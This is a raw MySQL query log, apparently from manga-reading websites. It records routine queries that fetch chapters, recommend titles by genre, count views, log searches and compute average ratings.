Quit 330660752 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660752 Query select * FROM chapter_images where chapter_id = '1954' 330660752 Quit 330660753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660753 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '100' and m.active = 1 330660753 Quit 330660754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660754 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='100' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330660754 Quit 330660755 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660755 Quit 330660756 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660756 Quit 330660757 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660757 Quit 330660758 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660758 Quit 330660759 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660760 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660760 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660760 Quit 330660759 Quit 330660761 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660762 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660761 Quit 330660762 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330660762 Quit 330660712 Quit 260225 19:30:12 330660763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660763 Quit 330660764 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'too-soon-to-fall-in-love-with-a-god' 330660764 Quit 330660765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660765 Query select * FROM chapters where manga_id = '346' order by id desc 330660765 Quit 330660766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660766 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '346' and m.active = 1 330660766 Quit 330660767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660767 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='346' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330660768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660768 Quit 330660769 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17022' 330660769 Quit 330660770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660770 Query select * FROM chapters where id = '17022' 330660770 Quit 330660771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660771 Query select * FROM chapters where manga_id = '197' order by id desc 330660771 Quit 330660772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660772 Query Update chapters set view=view+1 where id = '17022' 330660772 Quit 330660773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660773 Query select * FROM chapters where id = '17022' 330660773 Quit 330660774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660774 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17022' 330660774 Quit 330660775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660775 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '17022', '2405:9800:b950:b62c:7aa3:1ee:e25c:f89a', 'mangacherri.com', '2026-02-26 03:30:12', '2026-02-26 03:30:12') 330660775 Quit 330660776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660776 Query select * FROM chapter_images where chapter_id = '17022' 330660776 Quit 330660777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660777 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330660777 Quit 330660778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660778 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330660779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660779 Quit 330660780 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('A sign of affection', '2a02:2788:39:fb2f:2079:67cc:a863:aafe', '2026-02-26 03:30:12') 330660780 Quit 330660781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660781 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%A sign of affection%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%A sign of affection%' ) ) 330660782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660782 Quit 330660783 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'yubisaki-to-renren' 330660781 Quit 330660784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660784 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'A sign of affection ' 330660784 Quit 330660785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660785 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330660783 Quit 330660786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660786 Query select * FROM chapters where manga_id = '35' order by id desc 330660786 Quit 330660787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660787 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330660787 Quit 330660788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660788 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330660785 Quit 330660789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660789 Quit 330660790 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660790 Quit 330660791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330660791 Quit 330660792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330660792 Quit 330660793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330660793 Quit 330660794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330660794 Quit 330660795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330660795 Quit 330660796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330660796 Quit 330660797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330660797 Quit 330660798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330660798 Quit 330660799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330660799 Quit 330660800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330660800 Quit 330660801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330660801 Quit 330660802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330660802 Quit 330660803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330660803 Quit 330660804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330660804 Quit 330660805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330660805 Quit 330660806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330660806 Quit 330660807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330660807 Quit 330660808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330660808 Quit 330660809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330660809 Quit 330660810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330660810 Quit 330660811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330660811 Quit 330660812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330660812 Quit 330660813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330660813 Quit 330660814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330660814 Quit 330660815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330660815 Quit 330660816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330660816 Quit 330660817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330660817 Quit 330660818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330660818 Quit 330660819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330660819 Quit 330660820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330660820 Quit 330660821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330660821 Quit 330660822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330660822 Quit 330660823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330660823 Quit 330660824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330660824 Quit 330660825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330660825 Quit 330660826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330660826 Quit 330660827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330660827 Quit 330660828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330660828 Quit 330660829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330660829 Quit 330660830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330660830 Quit 330660831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330660831 Quit 330660832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330660832 Quit 330660833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330660833 Quit 330660834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330660834 Quit 330660835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330660835 Quit 330660836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330660836 Quit 330660837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330660837 Quit 330660838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330660838 Quit 330660839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330660839 Quit 330660840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330660840 Quit 330660841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330660841 Quit 330660842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330660842 Quit 330660843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330660843 Quit 330660844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330660844 Quit 330660845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330660845 Quit 330660846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330660846 Quit 330660847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330660847 Quit 330660848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330660848 Quit 330660849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330660849 Quit 330660850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330660850 Quit 330660851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330660851 Quit 330660852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330660852 Quit 330660853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330660853 Quit 330660854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330660854 Quit 330660855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330660855 Quit 330660856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330660856 Quit 330660857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330660857 Quit 330660858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330660858 Quit 330660859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330660859 Quit 330660860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330660860 Quit 330660861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330660861 Quit 330660862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330660862 Quit 330660863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330660863 Quit 330660864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330660864 Quit 330660865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330660865 Quit 330660866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330660866 Quit 330660867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330660867 Quit 330660868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330660868 Quit 330660869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330660869 Quit 330660870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330660870 Quit 330660871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330660871 Quit 330660872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330660872 Quit 330660873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330660873 Quit 330660874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330660874 Quit 330660875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330660875 Quit 330660876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330660876 Quit 330660877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330660877 Quit 330660878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330660878 Quit 330660879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330660879 Quit 330660880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330660880 Quit 330660881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330660881 Quit 330660882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330660882 Quit 330660883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330660883 Quit 330660884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330660884 Quit 330660885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330660885 Quit 330660886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330660886 Quit 330660887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330660887 Quit 330660888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330660888 Quit 330660889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330660889 Quit 330660890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330660890 Quit 330660891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330660891 Quit 330660892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330660892 Quit 330660893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330660893 Quit 330660894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330660894 Quit 330660895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330660895 Quit 330660896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330660896 Quit 330660897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330660897 Quit 330660898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330660898 Quit 330660899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330660899 Quit 330660900 Connect mangauser@localhost on 